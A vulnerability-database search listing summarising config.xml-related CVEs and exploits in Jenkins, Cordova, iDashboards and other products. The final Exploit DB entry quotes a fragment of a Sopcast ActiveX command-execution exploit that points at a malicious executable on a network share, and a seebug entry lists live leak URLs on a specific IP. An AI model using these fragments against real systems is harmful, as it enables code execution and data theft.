
533 matches found

RedhatCVE
added 2018/07/30 3:50 a.m. | 23 views

CVE-2018-1999001

An unauthorized modification of configuration vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in User.java that allows attackers to provide crafted login credentials that cause Jenkins to move the config.xml file from the Jenkins home directory. If Jenkins is started without...

CVSS 8.8 | AI score 4.7 | EPSS 0.27312
Exploits: 1 | References: 2

CNVD
added 2018/07/25 12:00 a.m. | 3 views

Jenkins Unauthorized User Resets Some Global Configurations Vulnerability

Jenkins is an open source, Java-based continuous integration tool for monitoring continuous, repetitive work; it aims to provide an open and easy-to-use software platform that makes continuous integration of software possible. Jenkins unauthorized user reset pa...

CVSS 8.8 | AI score 5.1 | EPSS 0.27312
Exploits: 1 | References: 1

NVD
added 2018/07/23 7:29 p.m. | 17 views

CVE-2018-1999001

An unauthorized modification of configuration vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in User.java that allows attackers to provide crafted login credentials that cause Jenkins to move the config.xml file from the Jenkins home directory. If Jenkins is started without...

CVSS 8.8 | AI score 8.5 | EPSS 0.27312
Exploits: 1 | References: 2

OSV
added 2018/07/23 7:29 p.m. | 19 views

CVE-2018-1999001

An unauthorized modification of configuration vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in User.java that allows attackers to provide crafted login credentials that cause Jenkins to move the config.xml file from the Jenkins home directory. If Jenkins is started without...

CVSS 8.8 | AI score 6.4
Exploits: 0 | References: 2

Prion
added 2018/05/15 9:29 p.m. | 14 views

Design/Logic Flaw

Jenkins before versions 2.44, 2.32.2 is vulnerable to a user data leak in disconnected agents' config.xml API. This could leak sensitive data such as API tokens (SECURITY-362)...

CVSS 3.5 | AI score 3.9 | EPSS 0.00023
Exploits: 0 | References: 4 | Affected Software: 1

Cvelist
added 2018/05/15 9:00 p.m. | 18 views

CVE-2017-2603

Jenkins before versions 2.44, 2.32.2 is vulnerable to a user data leak in disconnected agents' config.xml API. This could leak sensitive data such as API tokens (SECURITY-362)...

CVSS 2.6 | AI score 4.2 | EPSS 0.00023
Exploits: 0 | References: 4

OSV
added 2018/04/20 9:29 p.m. | 3 views

CVE-2018-10079

Geist WatchDog Console 3.2.2 uses a weak ACL for the C:\ProgramData\WatchDog Console directory, which allows local users to modify configuration data by updating (1) config.xml or (2) servers.xml...

CVSS 7.8 | AI score 5.8 | EPSS 0.00082
Exploits: 5 | References: 2

OSV
added 2018/02/18 4:29 a.m. | 3 views

CVE-2018-7209

An issue was discovered in iDashboards 9.6b. It allows remote attackers to obtain sensitive information via a direct request for the idashboards/config.xml URI, as demonstrated by intranet URLs for reports...

CVSS 7.5 | AI score 5.8
Exploits: 0 | References: 1

NVD
added 2018/02/18 4:29 a.m. | 12 views

CVE-2018-7209

An issue was discovered in iDashboards 9.6b. It allows remote attackers to obtain sensitive information via a direct request for the idashboards/config.xml URI, as demonstrated by intranet URLs for reports...

CVSS 7.5 | AI score 7.3 | EPSS 0.00315
Exploits: 1 | References: 1

OpenVAS
added 2017/12/26 12:00 a.m. | 64 views

Western Digital ShareSpace <= 2.3.02 WEB GUI Information Disclosure Vulnerability - Active Check

Western Digital ShareSpace is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

AI score 7
Exploits: 0 | References: 2

Veracode
added 2017/10/29 10:25 p.m. | 17 views

Modifiable Secondary Configuration Values

cordova-android has modifiable secondary configuration values. If an application is created without explicit values set in the config.xml file, attackers can set these variables by using Intent. Leveraging this, they can change the behavior of the application...

CVSS 5.3 | AI score 5.6 | EPSS 0.00625
Exploits: 1 | References: 4 | Affected Software: 1

Prion
added 2017/10/27 7:29 p.m. | 13 views

Code injection

Apache Cordova Android before 3.7.2 and 4.x before 4.0.2, when an application does not set explicit values in config.xml, allows remote attackers to modify undefined secondary configuration variables (preferences) via a crafted intent: URL...

CVSS 2.6 | AI score 6.9 | EPSS 0.00625
Exploits: 1 | References: 3 | Affected Software: 1

Cvelist
added 2017/10/27 7:00 p.m. | 24 views

CVE-2015-1835

Apache Cordova Android before 3.7.2 and 4.x before 4.0.2, when an application does not set explicit values in config.xml, allows remote attackers to modify undefined secondary configuration variables (preferences) via a crafted intent: URL...

AI score 5 | EPSS 0.00625
Exploits: 1 | References: 3

0day.today
added 2017/07/12 12:00 a.m. | 48 views

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability

DataTaker DT80 dEX version 1.50.012 suffers from an information disclosure vulnerability. + Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author...

CVSS 5 | AI score 8.8 | EPSS 0.91455
Exploits: 5

Exploit DB
added 2017/07/11 12:00 a.m. | 59 views

DataTaker DT80 dEX 1.50.012 - Information Disclosure

Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE: CVE-2017-11165 Vendor: ===============...

CVSS 9.8 | AI score 9.6 | EPSS 0.91455
Exploits: 5

Tenable Nessus
added 2017/03/08 12:00 a.m. | 218 views

Jenkins < 2.44 / 2.32.x < 2.32.2, Jenkins Operations Center < 1.625.22.1 / 2.7.22.0.1 / 2.32.2.1, and Jenkins Enterprise < 1.651.22.1 / 2.7.22.0.1 / 2.32.2.1 Multiple Vulnerabilities

The remote web server hosts a version of Jenkins that is prior to 2.44, or a version of Jenkins LTS prior to 2.32.2, or else a version of Jenkins Operations Center that is 1.625.x.y prior to 1.625.22.1, 2.7.x.0.y prior to 2.7.22.0.1, or 2.x.y.x prior to 2.32.2.1, or else a version of Jenkins...

CVSS 9.8 | AI score 6.3 | EPSS 0.06323
Exploits: 2 | References: 23

seebug.org
added 2015/02/02 12:00 a.m. | 21 views

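Oupeng Browser advertiser backend sensitive information disclosure vulnerability (proof of leaked content)

Brief description: J2EE architecture security. Detailed description: Leak points: http://59.151.113.225/WEB-INF/web.xml http://59.151.113.225/WEB-INF/spring/webmvc-config.xml Proof of vulnerability: Spring+Freemaker, decompiled class files...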

AI score 7.1
Exploits: 0

seebug.org
added 2014/07/01 12:00 a.m. | 10 views

D-Link DSL Router Remote Authentication Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13679/info Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances. This vulnerability...

AI score 7.1
Exploits: 0

Metasploit
added 2014/06/23 7:16 p.m. | 68 views

Windows Gather Skype Saved Password Hash Extraction

This module finds saved login credentials for the Windows Skype client. The hash is in MD5 format that uses the username, a static string "\nskyper\n" and the password. The resulting MD5 is stored in the Config.xml file for the user after being XOR'd against a key generated by applying 2 SHA1...

AI score 10
Exploits: 0

Exploit DB
added 2009/03/03 12:00 a.m. | 84 views

Sopcast SopCore Control - 'sopocx.ocx' Command Execution

window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...

AI score 7.4
Exploits: 0